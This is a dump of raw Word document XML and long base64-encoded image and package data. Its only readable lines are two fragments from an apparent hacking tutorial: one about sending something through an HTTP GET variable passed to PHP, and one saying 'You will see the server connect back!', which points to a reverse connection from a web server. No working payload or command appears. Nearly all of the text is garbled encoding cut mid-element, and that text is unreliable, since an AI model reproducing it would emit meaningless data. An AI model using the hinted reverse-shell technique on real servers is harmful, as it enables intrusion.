jmvDvw90fwz4i1/XrZJp9Y1u&#10;VZLq8upTLJsUYSFCfuRrzhBxkmqHxU+Fen/FzQ7fR9V1XWdO01JvNuLfSL02wvU2lTDMQCWjOeVG&#10;OQOa7Sip5YtcttAsrWKGg6Dp/hfRbHSNKtI7HTbGFYLe2iGFjRRgAfhV+iirGFFFFAHNeBvh7o/w&#10;9s76HS0mea/u5L28vLuUy3FzM55aRzycDCjsAAKxPip8E9D+Mj6XF4jvdXfSbJmaXR7O+aCzviSp&#10;H2hFGX2lQV5GMn1r0CiocIuPK1oLlVrEdvbxWdvFBBGsMEShI441CqigYAAHQAVJRRVjCiiigAoo&#10;ooA4D4qfBvT/AIuf2fDq2u+IdP0y2EiXGl6RqTWttqCPtylyqjLr8uBgjG4+tdppOlWehaXZ6bp9&#10;tHZ2FnCkFvbwrtSONQFVQOwAAFW6KlRSbklqxWV7hRRRVDCiiigAooooA5i8+HWi3fj6w8ZiKW21&#10;+0tZLIz28pQXMDc+XMo4kVW+Zc9DyK6eiikklsIp2Ojafpc95NZWNtZzXsvn3UkEKo08m0LvcgfM&#10;2FUZPOAB2q5RRTGUdO0PTtHmvZbDT7WylvZjcXUlvCsbTykAGSQgfM2ABuOTwKvUUUAFFFFABRRR&#10;QBR0fQ9O8O2Qs9K0+10y0DtILezhWKPczFmbaoAyWJJPckmr1FFABRRRQAVTh0bT7fVLnU4rG2i1&#10;K5jSKe8SFRNKiZ2Kz4ywXc2ATxk461cooAK5rxf8PdH8dXmiTayk11DpF39ths/NIt5JgPkaVOj7&#10;D8y54B5rpaKTSasxbhRRRTGFVdUsRqmmXdkZ57UXMLwme1kMcse5SNyMPusM5B7ECrVFAHK/DH4Z&#10;+H/hB4K0/wALeGbM2el2YYgyOZJZpGJaSaVzy8jsSzMeSSa6qiigAooooAKKKKACiiigAooooAKK&#10;KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA+XFkIrU8LSbvE+jjH/AC+w/wDoYrAj&#10;uElXcj7l9RWz4TcHxTowBH/H7D/6GKsGfStFFF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JNrGLeEJVzwLG6+MdF3KwH2yHr/wBdBVT5TWv4Sf8A4qzRB/0/Qf8Aoxas&#10;Vz6eoooqBh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8fNdlbpYdvUZL&#10;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&#10;KAGZZ/I/fn4H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QItABQABgAIAAAAIQDa9j37DQEAABQCAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAAPgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGQkRaQi&#10;AwAAbwoAAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAOEc&#10;qWGNRgAAjUYAABQAAAAAAAAAAAAAAAAAiwUAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAG&#10;AAgAAAAhAMJlT5DbAAAABgEAAA8AAAAAAAAAAAAAAAAASkwAAGRycy9kb3ducmV2LnhtbFBLAQIt&#10;ABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAAFJNAABkcnMvX3JlbHMvZTJvRG9j&#10;LnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAENOAAAAAA==&#10;">
                      <v:shape id="Picture 340838" o:spid="_x0000_s1065" type="#_x0000_t75" style="position:absolute;top:285;width:103822;height:9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pCTxgAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasJA&#10;EIbvhb7DMgVvdWOVIqmrSEHwqFFKj0N2uolmZ0N2TaJP3zkUehz++b/5ZrUZfaN66mId2MBsmoEi&#10;LoOt2Rk4n3avS1AxIVtsApOBO0XYrJ+fVpjbMPCR+iI5JRCOORqoUmpzrWNZkcc4DS2xZD+h85hk&#10;7Jy2HQ4C941+y7J37bFmuVBhS58Vldfi5kVjV9hwfAyHfZ3678VlcF/j3RkzeRm3H6ASjel/+a+9&#10;twbmi2w5F2H5RyCg178AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAE2qQk8YAAADfAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                        <v:imagedata r:id="rId187" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 251063" o:spid="_x0000_s1066" style="position:absolute;left:3714;width:1520;height:3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VOpxwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8ARva6qyotUooi563FVBvT2aZ1tsXkoTbfXXG2Fhj8PMfMNM540pxJ0ql1tW0OtGIIgT&#10;q3NOFRz2358jEM4jaywsk4IHOZjPWh9TjLWt+ZfuO5+KAGEXo4LM+zKW0iUZGXRdWxIH72Irgz7I&#10;KpW6wjrATSH7UTSUBnMOCxmWtMwoue5uRsFmVC5OW/us02J93hx/juPVfuyV6rSbxQSEp8b/h//a&#10;W62g/9WLhgN4/wlfQM5eAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACDlU6nHAAAA3wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5A054A04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="56"/>
                                </w:rPr>
                                <w:t xml:space="preserve">) </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 251064" o:spid="_x0000_s1067" style="position:absolute;left:4857;width:1267;height:3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MvdxwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8ARva6q4otUooi563FVBvT2aZ1tsXkoTbfXXG2Fhj8PMfMNM540pxJ0ql1tW0OtGIIgT&#10;q3NOFRz2358jEM4jaywsk4IHOZjPWh9TjLWt+ZfuO5+KAGEXo4LM+zKW0iUZGXRdWxIH72Irgz7I&#10;KpW6wjrATSH7UTSUBnMOCxmWtMwoue5uRsFmVC5OW/us02J93hx/juPVfuyV6rSbxQSEp8b/h//a&#10;W62g/9WLhgN4/wlfQM5eAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAK8My93HAAAA3wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="3D3FC89A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t xml:space="preserve">; </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 251069" o:spid="_x0000_s1068" style="position:absolute;left:59436;width:506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WRDyAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvulFoMKmriG1Jjm0UbG+P7GsSzL4N2a1J++u7BcHjMDPfMJvdaFpxpd41lhUsFxEI&#10;4tLqhisFp+PrfA3CeWSNrWVS8EMOdtvpZIOptgO/07XwlQgQdikqqL3vUildWZNBt7AdcfC+bG/Q&#10;B9lXUvc4BLhp5SqKYmmw4bBQY0eHmspL8W0UZOtu/5Hb36FqXz6z89s5eT4mXqmH2bh/AuFp9Pfw&#10;rZ1rBavHZRQn8P8nfAG5/QMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBBDWRDyAAAAN8A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="340ABBB5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="72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</w:tbl>
    <w:p w14:paraId="2E846C1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="19F8A0AE" wp14:editId="7238F273">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>10658475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1600200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="619125" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340839" name="Picture 340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39" name="Picture 340839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0"/>
        </w:rPr>
        <w:t>It is best to send it through the HTTP GET variable passed to PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934052D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBA0B4F" wp14:editId="35508DF9">
            <wp:extent cx="10515600" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="251745" name="Picture 251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45" name="Picture 251745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BB7601F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You will see the server connect back!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF57C2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
